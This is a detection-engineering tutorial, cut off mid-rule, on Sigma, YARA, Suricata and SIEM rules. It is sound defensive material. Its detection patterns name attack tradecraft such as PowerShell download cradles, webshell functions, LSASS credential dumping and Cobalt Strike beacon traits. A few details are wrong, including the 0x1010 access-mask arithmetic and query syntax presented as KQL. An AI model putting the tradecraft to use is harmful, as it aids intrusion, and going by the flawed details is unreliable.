Introduction

Detection engineering has evolved from writing simple SIEM queries to a disciplined engineering practice focused on building robust, scalable, and effective threat detection systems. In 2026, organizations face sophisticated adversaries who leverage living-off-the-land techniques, fileless malware, and cloud-native attacks that traditional signature-based detection cannot catch.

This guide covers modern detection engineering practices, including detection-as-code methodologies, advanced SIEM rule development, behavioral analytics, and threat hunting frameworks that form the foundation of effective defensive security operations.


1. Modern Threat Detection Landscape 2026

The Evolution of Detection Engineering

Traditional approach (legacy):

  • Signature-based detection
  • Static IOC matching
  • Vendor-specific rule formats
  • Manual rule creation and deployment

Modern approach (2026):

  • Behavior-based detection
  • Detection-as-code with version control
  • Platform-agnostic formats (Sigma)
  • Automated testing and deployment pipelines
  • Machine learning augmentation
  • Continuous validation and tuning

Detection Pyramid Framework

        [Threat Intelligence]
              /\
             /  \
    [Behavioral Analytics]
          /      \
         /        \
   [Correlation Rules]
      /            \
     /              \
[Signature Detection]

Each layer serves a purpose:

  • Signatures: Fast, low false-positive detection of known threats
  • Correlation: Context-aware detection combining multiple events
  • Behavioral: Anomaly detection based on baselines
  • Threat Intelligence: External IOC enrichment and validation

Key Metrics for Detection Effectiveness

Primary metrics:

  • Mean Time to Detect (MTTD): Average time from compromise to detection
  • Mean Time to Respond (MTTR): Average time from detection to containment
  • True Positive Rate: Percentage of real threats detected
  • False Positive Rate: Noise vs. signal ratio
  • Detection Coverage: Percentage of MITRE ATT&CK techniques covered

Target goals 2026:

  • MTTD: < 15 minutes for critical threats
  • MTTR: < 1 hour for critical incidents
  • True Positive Rate: > 85%
  • False Positive Rate: < 5%
  • ATT&CK Coverage: > 70% of relevant techniques

2. SIEM Platform Essentials

Platform Comparison 2026

Splunk Enterprise Security:

  • Strengths: Mature detection framework, extensive app ecosystem
  • Best for: Large enterprises with dedicated SOC teams
  • Detection format: SPL (Search Processing Language)

Elastic Security (ELK Stack):

  • Strengths: Open-source, highly customizable, excellent scalability
  • Best for: Organizations with engineering resources
  • Detection format: KQL (Kibana Query Language) + Detection Rules API

Microsoft Sentinel:

  • Strengths: Native Azure integration, low operational overhead
  • Best for: Cloud-first organizations using Microsoft ecosystem
  • Detection format: KQL + Analytics Rules

Wazuh:

  • Strengths: Open-source, lightweight, integrated HIDS/NIDS
  • Best for: Budget-conscious organizations, hybrid environments
  • Detection format: XML rules + Sigma integration

Log Source Architecture

Critical log sources for detection:

┌─────────────────────────────────────────────┐
│         Windows Security Events             │
│  - 4624 (Logon), 4625 (Failed Logon)       │
│  - 4688 (Process Creation)                 │
│  - 4720 (Account Created)                  │
│  - 4732 (User Added to Group)              │
└─────────────────────────────────────────────┘

┌─────────────────────────────────────────────┐
│         Sysmon (Enhanced Windows)           │
│  - Event ID 1 (Process Creation)           │
│  - Event ID 3 (Network Connection)         │
│  - Event ID 7 (Image Loaded)               │
│  - Event ID 10 (Process Access)            │
└─────────────────────────────────────────────┘

┌─────────────────────────────────────────────┐
│         Linux Audit Logs                    │
│  - /var/log/auth.log (authentication)      │
│  - /var/log/audit/audit.log (syscalls)     │
│  - Process execution (execve)              │
└─────────────────────────────────────────────┘

┌─────────────────────────────────────────────┐
│         Network Traffic                     │
│  - Firewall logs (allow/deny)              │
│  - DNS queries (potential C2)              │
│  - Proxy logs (web traffic)                │
│  - IDS/IPS alerts (Suricata/Snort)         │
└─────────────────────────────────────────────┘

┌─────────────────────────────────────────────┐
│         Cloud Platform Logs                 │
│  - AWS CloudTrail (API calls)              │
│  - Azure Activity Log (resource changes)   │
│  - GCP Audit Logs (admin activity)         │
│  - Container runtime logs                  │
└─────────────────────────────────────────────┘

Image suggestion: Log source architecture diagram showing collection points, aggregation, and SIEM ingestion flow.

Log Enrichment Strategy

Raw logs lack context. Enrich before detection:

Original log:
  src_ip: 192.168.1.100
  dst_ip: 10.0.5.50
  dst_port: 445

Enriched log:
  src_ip: 192.168.1.100
  src_hostname: WORKSTATION-042
  src_user: jsmith
  src_department: Finance
  dst_ip: 10.0.5.50
  dst_hostname: DC-PRIMARY
  dst_service: SMB
  dst_port: 445
  geo_country: US
  threat_intel_match: false
  asset_criticality: high

Enrichment sources:

  • CMDB/Asset inventory
  • Active Directory/LDAP
  • Threat intelligence feeds
  • GeoIP databases
  • User/Entity Behavior Analytics (UEBA)

3. Sigma Rule Development

What is Sigma?

Sigma is a generic signature format for SIEM systems, allowing detection rules to be written once and converted to multiple SIEM query languages.

Benefits:

  • Platform-agnostic detection content
  • Version control and collaboration (GitHub)
  • Community-driven rule repository
  • Automated conversion to target SIEM
  • Easier testing and validation

Sigma Rule Anatomy

Basic structure:

title: Suspicious PowerShell Download Execution
id: 3b6ab547-8ec2-4991-b9d2-2b06702a3d7c
status: experimental
description: Detects PowerShell downloading and executing content from the internet
author: Detection Team
date: 2025/01/15
modified: 2025/01/15
tags:
  - attack.execution
  - attack.t1059.001  # PowerShell
  - attack.defense_evasion
  - attack.t1140      # Deobfuscate/Decode Files
logsource:
  category: process_creation
  product: windows
detection:
  selection_img:
    Image|endswith: '\powershell.exe'
  selection_cli:
    CommandLine|contains:
      - 'IEX'
      - 'Invoke-Expression'
      - 'DownloadString'
      - 'DownloadFile'
      - 'Net.WebClient'
      - 'Start-BitsTransfer'
  condition: selection_img and selection_cli
falsepositives:
  - Legitimate software updates
  - IT administration scripts
level: high

Detection logic: This rule identifies PowerShell processes executing download operations by matching the process image (powershell.exe) combined with command-line arguments containing download or execution keywords. The selection_img ensures it’s PowerShell, while selection_cli catches common download methods like DownloadString (fetch web content), IEX (Invoke-Expression for executing downloaded code), and Start-BitsTransfer (BITS service for file transfers). Both conditions must be met (and operator) to trigger an alert.

Why it works: Attackers commonly use PowerShell for initial payload execution because it’s pre-installed on Windows and can download/execute code in memory without touching disk. This pattern is seen in phishing campaigns, living-off-the-land attacks, and post-exploitation activity.

Key components:

  • logsource: Defines which logs this rule applies to (process creation events from Windows)
  • detection: Boolean logic for matching events (both image AND command-line must match)
  • falsepositives: Known benign scenarios that may trigger alerts
  • level: Severity rating (high = requires prompt investigation)

Advanced Sigma Techniques

Time-based correlation:

title: Multiple Failed Logins Followed by Success
id: a5b8ecef-4a91-4b0c-86d4-9f7f8c0eaf01
detection:
  selection_failed:
    EventID: 4625
    TargetUserName: '*'
  selection_success:
    EventID: 4624
    TargetUserName: '*'
  timeframe: 5m
  condition: selection_failed | count(TargetUserName) > 5 and selection_success

Note: This is a conceptual example of time-based correlation. Standard Sigma doesn’t natively support temporal correlation with count() and timeframe in this exact syntax. This pattern must be implemented directly in your SIEM platform.

Detection logic: Identifies potential brute force authentication attacks by detecting more than 5 failed login attempts (Event ID 4625) for the same username within a 5-minute window, followed by a successful login (Event ID 4624). This pattern suggests an attacker successfully guessed credentials after multiple attempts.

Implementation examples:

Splunk SPL:

index=windows EventCode=4625 OR EventCode=4624
| bin _time span=5m
| stats count(eval(EventCode=4625)) as failed, 
        count(eval(EventCode=4624)) as success 
        by _time, TargetUserName
| where failed > 5 AND success > 0

Elastic Detection Rule:

sequence by user.name with maxspan=5m
  [authentication where event.outcome == "failure"] with runs=6
  [authentication where event.outcome == "success"]

Field aggregation:

title: Suspicious Process Parent-Child Relationship
detection:
  selection:
    ParentImage|endswith: '\winword.exe'
    Image|endswith:
      - '\powershell.exe'
      - '\cmd.exe'
      - '\wscript.exe'
      - '\cscript.exe'
  condition: selection

Detection logic: Detects Microsoft Word spawning command interpreters or scripting engines, a common indicator of malicious macros or exploit documents. Legitimate Word documents rarely need to execute PowerShell, cmd.exe, or script hosts. This pattern is frequently seen in phishing campaigns where macro-enabled documents download and execute payloads.

Why this matters: When Word executes these processes, it typically means:

  • A macro is running malicious code
  • An exploit (like equation editor vulnerability) triggered
  • A user opened a weaponized document

Common attack flow:

  1. User receives phishing email with .docm attachment
  2. User enables macros (often via social engineering)
  3. Macro executes PowerShell to download additional malware
  4. This rule triggers on step 3

Sigma conversion to SIEM:

# Convert to Splunk SPL
sigmac -t splunk -c tools/config/generic/sysmon.yml rules/windows/process_creation/

# Convert to Elastic Query DSL
sigmac -t es-qs -c tools/config/winlogbeat.yml rules/

# Convert to Microsoft Sentinel KQL
sigmac -t ala -c tools/config/generic/sysmon.yml rules/

# Convert to QRadar AQL
sigmac -t qradar -c tools/config/generic/sysmon.yml rules/

Detection Rule Testing Framework

Atomic Red Team integration:

# Rule: detect_mimikatz_usage.yml
title: Mimikatz Credential Dumping Detection

# Test with Atomic Red Team
test_command: |
  Invoke-AtomicTest T1003.001 -TestNumber 1
  # Should trigger: Image contains 'mimikatz.exe'
    
expected_events:
  - EventID: 10
    SourceImage: '*\lsass.exe'
    GrantedAccess: '0x1010'

Detection validation: This demonstrates how to test Sigma rules using Atomic Red Team, a framework that safely simulates attack techniques. The command Invoke-AtomicTest T1003.001 executes a controlled test of LSASS credential dumping (Mimikatz technique).

Expected behavior:

  • EventID 10: Sysmon Process Access event (monitors when one process accesses another’s memory)
  • TargetImage: lsass.exe (Local Security Authority Subsystem Service - stores credentials)
  • GrantedAccess 0x1010: Hexadecimal access rights breakdown:
    • 0x0400 = PROCESS_QUERY_INFORMATION (query process info)
    • 0x0010 = PROCESS_VM_READ (read process memory)
    • Combined = ability to read credentials from LSASS memory

Why test with Atomic: Validates your detection works before real attacks occur. If this test doesn’t trigger your alert, your detection has a gap.

Continuous validation pipeline:

# 1. Validate Sigma syntax
sigma-validator rules/*.yml

# 2. Test conversion to all platforms
sigmac -t splunk,elastic,sentinel rules/*.yml

# 3. Run against test dataset
sigma-test rules/*.yml --dataset test-logs/

# 4. Check coverage
sigma-coverage rules/ --mitre-attack

4. YARA Rules for Malware Detection

YARA Rule Structure

YARA identifies and classifies malware based on textual or binary patterns.

Basic malware detection:

rule Cobalt_Strike_Beacon {
    meta:
        description = "Detects Cobalt Strike Beacon payloads"
        author = "Detection Team"
        date = "2025-01-15"
        hash = "5d2a4cde9fa7c2fdbf39b2e2faa23fea"
        severity = "critical"
        
    strings:
        $mz = "MZ"
        $beacon_config = { 00 01 00 01 00 02 }
        $sleep_mask = "sleep_mask"
        $http_get = "GET /" ascii wide
        $http_post = "POST /" ascii wide
        $user_agent = "User-Agent:" ascii wide
        
    condition:
        $mz at 0 and 
        3 of ($beacon_config, $sleep_mask, $http_get, $http_post, $user_agent)
}

Detection logic: Identifies Cobalt Strike Beacon payloads by combining PE file structure validation with Beacon-specific artifacts:

String breakdown:

  • $mz = "MZ": DOS header signature (all Windows executables start with this)
  • $beacon_config = { 00 01 00 01 00 02 }: Byte sequence from Beacon’s configuration block
  • $sleep_mask: Feature string for Beacon’s sleep obfuscation functionality
  • $http_get / $http_post: HTTP method strings used for C2 communication
  • $user_agent: HTTP header string for beacon callbacks

Modifiers:

  • ascii: Match ASCII-encoded strings
  • wide: Match Unicode (UTF-16) strings
  • Both together: Search for strings in either encoding

Condition logic:

  • $mz at 0: MZ header MUST be at file offset 0 (validates PE structure)
  • 3 of (...): At least 3 of the listed strings must be present
  • This reduces false positives from legitimate HTTP libraries while catching most Beacon variants

Use cases: Scan files on disk, memory dumps, network captures (PCAP), or uploaded files.

Advanced pattern matching:

rule Webshell_Generic_Detection {
    meta:
        description = "Generic webshell detection using suspicious function combinations"
        author = "Detection Team"
        
    strings:
        // PHP webshell indicators
        $php_exec = /exec\s*\(/ nocase
        $php_system = /system\s*\(/ nocase
        $php_shell = /shell_exec\s*\(/ nocase
        $php_passthru = /passthru\s*\(/ nocase
        $php_eval = /eval\s*\(/ nocase
        $php_base64 = "base64_decode" nocase
        
        // Suspicious network functions
        $php_socket = "fsockopen" nocase
        $php_curl = "curl_exec" nocase
        
        // File operations
        $php_upload = "$_FILES" nocase
        $php_include = /include\s*\(/ nocase
        
    condition:
        (2 of ($php_exec, $php_system, $php_shell, $php_passthru)) and
        ($php_base64 or $php_eval) and
        (filesize < 100KB)
}

Detection logic: Catches generic PHP webshells by identifying suspicious function combinations rather than specific webshell variants. This behavioral approach detects both known and unknown webshells.

Why these functions matter:

  • Command execution (exec, system, shell_exec, passthru): Allow executing operating system commands
  • Obfuscation (base64_decode, eval): Attackers encode malicious code to evade detection
  • Network functions (fsockopen, curl_exec): Enable reverse shells and data exfiltration
  • File operations ($_FILES, include): File upload and remote code inclusion

Regex explanation:

  • /exec\s*\(/: Matches exec(, exec (, exec ( (any whitespace between function name and parenthesis)
  • nocase: Case-insensitive matching (catches EXEC(), Exec(), etc.)

Condition logic:

  1. At least 2 command execution functions (strong indicator of malicious intent)
  2. AND either obfuscation method (attackers hide their code)
  3. AND file smaller than 100KB (webshells are typically small; excludes large legitimate PHP applications)

Why this works: Legitimate PHP applications rarely combine command execution with obfuscation in small files. Webshells need these capabilities for remote access and evasion.

Memory scanning for process injection:

rule Process_Injection_Reflective_DLL {
    meta:
        description = "Detects reflective DLL injection in memory"
        
    strings:
        $api1 = "VirtualAlloc" ascii wide
        $api2 = "VirtualProtect" ascii wide
        $api3 = "WriteProcessMemory" ascii wide
        $api4 = "CreateRemoteThread" ascii wide
        $api5 = "NtQueueApcThread" ascii wide
        
        $pattern1 = { 4D 5A ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 50 45 }
        $pattern2 = { 55 89 E5 83 EC ?? 89 ?? ?? 8B ?? ?? E8 }
        
    condition:
        3 of ($api*) and any of ($pattern*)
}

Detection logic: Identifies process injection techniques by detecting Windows API function strings combined with PE file patterns in process memory. Reflective DLL injection loads malicious code into another process’s memory without writing to disk.

API functions explained:

  • VirtualAlloc: Allocates memory in target process
  • VirtualProtect: Changes memory permissions (e.g., from read-only to executable)
  • WriteProcessMemory: Writes malicious code into allocated memory
  • CreateRemoteThread: Executes injected code by creating a thread in target process
  • NtQueueApcThread: Alternative execution method using Asynchronous Procedure Call

Binary patterns:

  • $pattern1: PE header signature

    • 4D 5A = “MZ” (DOS header)
    • ?? = wildcard bytes (variable data)
    • 50 45 = “PE” (PE header marker)
    • Detects PE files loaded in memory without being on disk
  • $pattern2: x86 function prologue (assembly)

    • 55 = push ebp (save base pointer)
    • 89 E5 = mov ebp, esp (set up stack frame)
    • 83 EC = sub esp, ?? (allocate stack space)
    • Common pattern at start of injected functions

Condition: At least 3 API functions AND any binary pattern must be present. This catches both the injection mechanism (APIs) and the payload (PE structure).

Use case: Scan process memory dumps, monitor running processes, or analyze malware samples. Common in fileless malware, APT activity, and post-exploitation tools.

Image suggestion: YARA rule matching process showing string patterns, PE header analysis, and detection logic flow.

YARA Integration with SIEM

Scanning files from log events:

import yara
import json

# Load YARA rules
rules = yara.compile(filepath='malware_rules.yar')

def scan_file_event(file_path):
    """Scan file mentioned in security event"""
    try:
        matches = rules.match(filepath=file_path)
        if matches:
            alert = {
                "timestamp": datetime.now().isoformat(),
                "file_path": file_path,
                "yara_matches": [str(m) for m in matches],
                "severity": "high",
                "action_required": "quarantine"
            }
            # Send to SIEM
            send_to_siem(alert)
            return True
    except Exception as e:
        log_error(f"YARA scan failed: {e}")
    return False

Automated scanning pipeline:

# Monitor file creation events
# When new file detected, scan with YARA

wazuh.conf:
<localfile>
  <log_format>syslog</log_format>
  <location>/var/log/file_creation.log</location>
</localfile>

<active-response>
  <command>yara-scan</command>
  <location>local</location>
  <rules_id>554</rules_id>
</active-response>

5. Network IDS Signatures (Suricata/Snort)

Suricata Rule Format

Suricata provides high-performance network threat detection.

Basic HTTP malware download detection:

alert http any any -> any any (
    msg:"Possible Malware Download - Executable via HTTP";
    flow:established,to_client;
    file_data;
    content:"MZ"; offset:0; depth:2;
    content:"This program cannot be run in DOS mode";
    classtype:trojan-activity;
    sid:1000001;
    rev:1;
)

Detection logic: Identifies Windows executable files (PE format) being downloaded over unencrypted HTTP by inspecting the file content for PE header signatures.

Rule components:

  • alert http: Trigger on HTTP protocol traffic
  • any any -> any any: Match any source/destination (bidirectional)
  • flow:established,to_client: Only inspect established TCP connections with data flowing TO the client (downloads)
  • file_data: Inspect HTTP response body (not headers)
  • content:"MZ"; offset:0; depth:2:
    • “MZ” is the DOS header signature (first 2 bytes of all Windows PE files)
    • offset:0 = start at beginning of file
    • depth:2 = only check first 2 bytes for efficiency
  • content:"This program cannot be run in DOS mode": Standard DOS stub message in PE files
  • classtype:trojan-activity: Categorize as malware-related
  • sid:1000001: Unique signature identifier (1000000+ for custom rules)
  • rev:1: Revision number

Why this works: Legitimate software should be downloaded over HTTPS in 2026. HTTP downloads of executables are suspicious and often indicate malware distribution or compromised websites.

Limitations: Won’t detect HTTPS downloads (encrypted traffic). Consider using TLS inspection or endpoint monitoring for complete coverage.

DNS tunneling detection:

alert dns any any -> any any (
    msg:"Possible DNS Tunneling - Excessive Subdomain Length";
    dns.query;
    content:".";
    pcre:"/[a-z0-9]{50,}\./i";
    threshold:type both, track by_src, count 10, seconds 60;
    classtype:policy-violation;
    sid:1000002;
    rev:1;
)

Detection logic: Identifies DNS tunneling by detecting unusually long subdomain labels, a common indicator of data exfiltration through DNS queries.

How DNS tunneling works:

  • Normal DNS: www.example.com (short, readable labels)
  • DNS tunneling: 48656c6c6f576f726c64.attacker.com (data encoded as subdomain)
  • Attackers encode data (files, commands) into subdomain names to bypass network security

Rule components:

  • dns.query: Inspect DNS query packets (outbound requests, not responses)
  • content:".": Ensure there’s at least one dot (domain separator)
  • pcre:"/[a-z0-9]{50,}\./i": Regular expression explained:
    • [a-z0-9] = alphanumeric characters
    • {50,} = 50 or more consecutive characters
    • \. = followed by a literal dot
    • /i = case-insensitive flag
    • Matches subdomains with 50+ character labels
  • threshold:type both, track by_src, count 10, seconds 60:
    • type both = alert AND rate-limit
    • track by_src = count per source IP
    • count 10 = trigger after 10 matches
    • seconds 60 = within 60-second window
    • Effect: Alert only if one IP makes 10+ long DNS queries per minute

Why threshold matters: Single long DNS query could be legitimate (long subdomain). Multiple queries indicate tunneling activity.

Tuning recommendations:

  • Adjust length from 50 to match your environment (some CDNs use long subdomains)
  • Whitelist known services with long DNS names
  • Monitor for patterns: tunneling creates bursts of similar-length queries

Cobalt Strike C2 communication:

alert http any any -> any any (
    msg:"Cobalt Strike Beacon HTTP GET Request";
    flow:established,to_server;
    content:"GET"; http_method;
    content:"/activity"; http_uri; depth:9;
    http.accept; content:"text/html,application/xhtml+xml"; depth:32;
    http.accept_language; content:!"en";
    classtype:trojan-activity;
    reference:url,attack.mitre.org/software/S0154;
    sid:1000003;
    rev:2;
)

Detection logic: Identifies Cobalt Strike Beacon HTTP GET requests by matching default URI patterns and HTTP headers commonly used in Beacon profiles.

Rule components:

  • flow:established,to_server: Monitor client-to-server traffic (beacon callbacks)
  • content:"GET"; http_method: Match HTTP GET requests specifically
  • content:"/activity"; http_uri; depth:9:
    • “/activity” is a default Beacon URI (also common: /pixel.gif, /match)
    • depth:9 = check only first 9 characters of URI for efficiency
  • http.accept; content:"text/html,application/xhtml+xml":
    • Default Beacon Accept header
    • Real browsers include more content types
  • http.accept_language; content:!"en":
    • ! = NOT operator
    • Beacon often omits Accept-Language or uses non-standard values
    • Legitimate browsers always send this header

Why this works: Cobalt Strike uses specific default HTTP profiles. While these can be customized, many operators use defaults for convenience.

Important note: This signature catches DEFAULT Beacon profiles. Sophisticated attackers customize their Beacon profiles to blend with legitimate traffic. Use this as one detection layer, not the only one.

Recommended improvements:

  • Add JA3/JA3S fingerprinting for TLS beacons
  • Monitor for regular callback intervals (beacons check in periodically)
  • Combine with endpoint detection (process creating network connections)
  • Update URI patterns based on observed Beacon profiles in your environment

Image suggestion: Network traffic analysis diagram showing packet inspection, signature matching, and alert generation flow.

Advanced Detection Techniques

TLS/SSL certificate anomalies:

alert tls any any -> any any (
    msg:"Suspicious Self-Signed Certificate Detected";
    tls.cert_subject; content:"CN=localhost";
    tls.cert_chain_len:<2;
    classtype:policy-violation;
    sid:1000004;
    rev:1;
)

Detection logic: Identifies self-signed TLS certificates with suspicious Common Names, often used by malware C2 servers, penetration testing tools, or hastily configured malicious infrastructure.

Rule components:

  • alert tls: Trigger on TLS/SSL protocol traffic
  • tls.cert_subject; content:"CN=localhost":
    • Inspect certificate subject field
    • Match Common Name (CN) = “localhost”
    • Production systems should never use “localhost” in certificates
  • tls.cert_chain_len:<2:
    • Certificate chain length less than 2
    • Self-signed certs have chain length of 1 (no intermediate CA)
    • Legitimate certificates have chain: Server cert → Intermediate CA → Root CA (length ≥ 2)

Why this matters:

  • Legitimate services use certificates signed by trusted Certificate Authorities (CA)
  • Attackers/malware often use self-signed certificates because:
    • Free and instant (no CA validation required)
    • Don’t care about browser warnings
    • Quick to set up for C2 infrastructure
  • Common malicious CNs: localhost, example.com, test, default, or attacker-controlled domains

Common sources of this alert:

  • Cobalt Strike team servers (default self-signed cert)
  • Metasploit handlers
  • Custom C2 frameworks
  • Reverse shells with TLS
  • Internal testing tools accidentally exposed

Tuning recommendations:

  • Whitelist known internal services with self-signed certs (development environments)
  • Add additional suspicious CN patterns: “example.com”, “test”, “default”
  • Correlate with destination IPs (self-signed cert + unknown external IP = high priority)

Protocol anomaly detection:

alert tcp any any -> any 22 (
    msg:"Possible SSH Brute Force Attack";
    flow:to_server;
    flags:S;
    threshold:type both, track by_src, count 20, seconds 60;
    classtype:attempted-admin;
    sid:1000005;
    rev:1;
)

Detection logic: Identifies SSH brute force attacks by detecting excessive connection attempts from a single source to SSH servers (port 22).

Rule components:

  • alert tcp: Monitor TCP protocol
  • any any -> any 22: Any source → any destination on port 22 (SSH)
  • flow:to_server: Traffic flowing TO the server (client initiating connections)
  • flags:S:
    • Match TCP SYN flag
    • SYN = connection initiation packet
    • Each connection attempt starts with SYN
  • threshold:type both, track by_src, count 20, seconds 60:
    • Alert if one source IP makes 20+ SSH connection attempts within 60 seconds
    • type both = alert AND rate-limit to avoid alert flooding

Why this works:

  • Legitimate users: 1-2 SSH connections per minute (normal usage)
  • Brute force tools: 10-100+ connections per minute (trying many passwords rapidly)

Attack pattern:

  1. Attacker targets SSH server with weak credentials
  2. Tool (hydra, medusa, patator) tries thousands of username/password combinations
  3. Each attempt = new TCP connection → SYN packet
  4. This rule catches the rapid connection burst

Tuning recommendations:

  • Adjust count based on your environment (20 is moderate; decrease for tighter security)
  • Whitelist trusted admin IPs (automated deployments may trigger this)
  • Combine with failed authentication logs from SSH server for higher fidelity
  • Consider lowering threshold to 10 for internet-facing SSH servers

Next steps after alert:

  • Check source IP reputation (known attacker IP?)
  • Review SSH logs for successful authentications
  • Block source IP at firewall if confirmed malicious
  • Implement SSH key-based auth instead of passwords

Suricata Integration with SIEM

EVE JSON output to SIEM:

# suricata.yaml
outputs:
  - eve-log:
      enabled: yes
      filetype: regular
      filename: eve.json
      types:
        - alert:
            payload: yes
            metadata: yes
        - http:
            extended: yes
        - dns:
            query: yes
            answer: yes
        - tls:
            extended: yes
        - files:
            force-magic: yes
        - flow:
            enabled: yes

Forward to Elastic:

# Filebeat configuration
filebeat.inputs:
- type: log
  enabled: true
  paths:
    - /var/log/suricata/eve.json
  json.keys_under_root: true
  fields:
    source: suricata
    
output.elasticsearch:
  hosts: ["elasticsearch:9200"]
  index: "suricata-%{+yyyy.MM.dd}"

6. Log Analysis & Correlation Techniques

Statistical Baseline Detection

Identify anomalous authentication patterns:

Splunk SPL:
index=windows EventCode=4624
| stats count by user, src_ip
| eventstats avg(count) as avg, stdev(count) as stdev
| eval isOutlier=if(count > (avg + (2*stdev)), 1, 0)
| where isOutlier=1
| table user, src_ip, count, avg

Detection logic: Uses statistical analysis to identify abnormal authentication patterns by calculating baselines and detecting outliers that deviate significantly from normal behavior.

Query breakdown:

  1. index=windows EventCode=4624: Search successful logon events (Windows Security Event ID 4624)
  2. stats count by user, src_ip: Count logons per user from each source IP
  3. eventstats avg(count) as avg, stdev(count) as stdev:
    • Calculate average (mean) logon count across all users/IPs
    • Calculate standard deviation (how spread out the data is)
    • eventstats keeps individual rows while adding statistical fields
  4. eval isOutlier=if(count > (avg + (2*stdev)), 1, 0):
    • Mark as outlier if count exceeds mean + 2 standard deviations
    • 2 standard deviations = ~95% confidence interval
    • Anything beyond this is statistically unusual
  5. where isOutlier=1: Filter to show only outliers
  6. table user, src_ip, count, avg: Display results in readable format

What this catches:

  • User accounts with abnormally high logon activity (potentially compromised)
  • Source IPs generating excessive authentication attempts
  • Lateral movement (attacker logging into many systems)
  • Shared credential abuse

Example scenario:

  • Normal user: 5 logons/day
  • Compromised user: 150 logons/day (accessing many systems)
  • Average: 10 logons/day, StdDev: 15
  • Threshold: 10 + (2 × 15) = 40
  • Compromised account (150) triggers alert

Tuning: Adjust multiplier (2× can be 3× for fewer false positives or 1.5× for more sensitive detection)

Detect data exfiltration:

Elastic KQL:
event.category: network AND network.direction: outbound
| stats sum(network.bytes) as total_bytes by source.ip, destination.ip
| where total_bytes > 100000000

Detection logic: Identifies potential data exfiltration by detecting large volumes of outbound network traffic from internal hosts to external destinations.

Query breakdown:

  1. event.category: network AND network.direction: outbound:
    • Filter for network events
    • Only outbound traffic (data leaving your network)
  2. stats sum(network.bytes) as total_bytes by source.ip, destination.ip:
    • Aggregate (sum) total bytes transferred
    • Group by source IP (internal host) and destination IP (external server)
  3. where total_bytes > 100000000:
    • Filter for transfers exceeding 100MB (100,000,000 bytes)
    • Adjust threshold based on your environment

What this catches:

  • Attacker exfiltrating sensitive data (databases, documents, intellectual property)
  • Ransomware encrypting and uploading data before encryption
  • Insider threats copying data to external storage
  • Compromised cloud sync services

Example scenarios:

  • Legitimate: Software update (100MB download) - won’t trigger (inbound, not outbound)
  • Suspicious: Workstation uploads 2GB to unknown cloud storage in 10 minutes
  • Critical: Database server transfers 50GB to external IP at 3 AM

Tuning recommendations:

  • Adjust byte threshold based on normal traffic patterns (100MB is moderate)
  • Whitelist known backup destinations and cloud services
  • Set different thresholds for different hosts (workstation vs. server)
  • Add time-based filters (alerts during off-hours are more suspicious)
  • Correlate with user activity (data transfer without logged-in user = suspicious)

Enhanced version:

event.category: network AND network.direction: outbound
| stats sum(network.bytes) as total_bytes by source.ip, destination.ip
| where total_bytes > 100000000
| lookup destination.ip in threat_intel
| where NOT destination.ip in known_cloud_services

Behavioral Analytics

Unusual process execution chains:

Microsoft Sentinel KQL:
SecurityEvent
| where EventID == 4688  // Process creation
| extend ParentProcess = tostring(split(ParentProcessName, '\\')[-1])
| extend ChildProcess = tostring(split(NewProcessName, '\\')[-1])
| where ParentProcess == "winword.exe" and ChildProcess in ("powershell.exe", "cmd.exe", "wscript.exe")
| project TimeGenerated, Computer, Account, ParentProcess, ChildProcess, CommandLine

Detection logic: Detects suspicious parent-child process relationships where Microsoft Office applications spawn command interpreters or scripting engines, typically indicating macro-based malware or document exploits.

Query breakdown:

  1. SecurityEvent | where EventID == 4688:
    • Query Windows Security Event 4688 (Process Creation)
    • Every time a new process starts, this event is logged
  2. extend ParentProcess = tostring(split(ParentProcessName, '\\')[-1]):
    • Extract just the filename from full path
    • Example: C:\Program Files\Microsoft Office\WINWORD.EXEWINWORD.EXE
    • split() splits path by backslash, [-1] takes last element
  3. extend ChildProcess = tostring(split(NewProcessName, '\\')[-1]):
    • Same extraction for child process (newly created process)
  4. where ParentProcess == "winword.exe" and ChildProcess in (...):
    • Filter for Word spawning suspicious processes:
      • powershell.exe: PowerShell (often used for payload download/execution)
      • cmd.exe: Command Prompt (can execute batch scripts, download files)
      • wscript.exe: Windows Script Host (runs .vbs, .js scripts)
  5. project TimeGenerated, Computer, Account, ParentProcess, ChildProcess, CommandLine:
    • Display relevant fields including the command-line arguments (shows what the process was doing)

Attack flow this catches:

  1. User opens malicious .docm file from phishing email
  2. User enables macros (social engineering: “Enable content to view document”)
  3. Macro executes: winword.exe spawns powershell.exe
  4. PowerShell downloads and executes second-stage payload
  5. This query triggers at step 3

Why this is suspicious:

  • Legitimate Word documents don’t need to execute PowerShell
  • Modern Office security disables macros by default
  • Attackers rely on users enabling macros to bypass security

Extend detection to other Office apps:

where ParentProcess in ("winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe")

Investigate after alert:

  • Review CommandLine field (what command was executed?)
  • Check document source (email attachment? downloaded from where?)
  • Analyze process chain (what did PowerShell do next?)
  • Quarantine document and scan endpoint

Off-hours administrative activity:

# Wazuh rule
<rule id="100200" level="10">
  <if_sid>5712</if_sid>  <!-- User logon -->
  <user>admin|root</user>
  <time>8pm - 6am</time>
  <weekday>saturday,sunday</weekday>
  <description>Administrator logon outside business hours</description>
  <group>authentication_success,pci_dss_10.2.5</group>
</rule>

Detection logic: Flags administrative account logins occurring during off-hours (nights and weekends), which may indicate unauthorized access, compromised credentials, or insider threats.

Rule components:

  • <rule id="100200" level="10">:
    • Custom rule ID (100000+ range for user rules)
    • Level 10 = high severity (requires investigation)
  • <if_sid>5712</if_sid>:
    • Inherit from parent rule 5712 (successful user logon)
    • Wazuh’s rule hierarchy: this adds conditions to existing logon detection
  • <user>admin|root</user>:
    • Match usernames containing “admin” OR “root”
    • Catches: administrator, admin, root, sysadmin, etc.
    • Pipe (|) = OR operator in regex
  • <time>8pm - 6am</time>:
    • Trigger only between 20:00 and 06:00 (overnight hours)
    • Assumes business hours are 6am-8pm
  • <weekday>saturday,sunday</weekday>:
    • Also triggers on weekends (regardless of time)
  • <group>authentication_success,pci_dss_10.2.5</group>:
    • Tag with categories for reporting
    • PCI DSS 10.2.5 = compliance requirement (track privileged access)

What this catches:

  • Compromised admin credentials used by attacker at night
  • Insider threat working outside normal hours
  • Unauthorized admin access from external location
  • Persistence mechanism activating after-hours

Example scenarios:

  • Benign: IT admin performing scheduled maintenance (document and whitelist)
  • Suspicious: Admin login at 2 AM from unknown IP (investigate immediately)
  • Critical: Multiple failed logins followed by success at 3 AM Sunday (likely breach)

Tuning recommendations:

<!-- Whitelist scheduled maintenance windows -->
<rule id="100201" level="0">
  <if_sid>100200</if_sid>
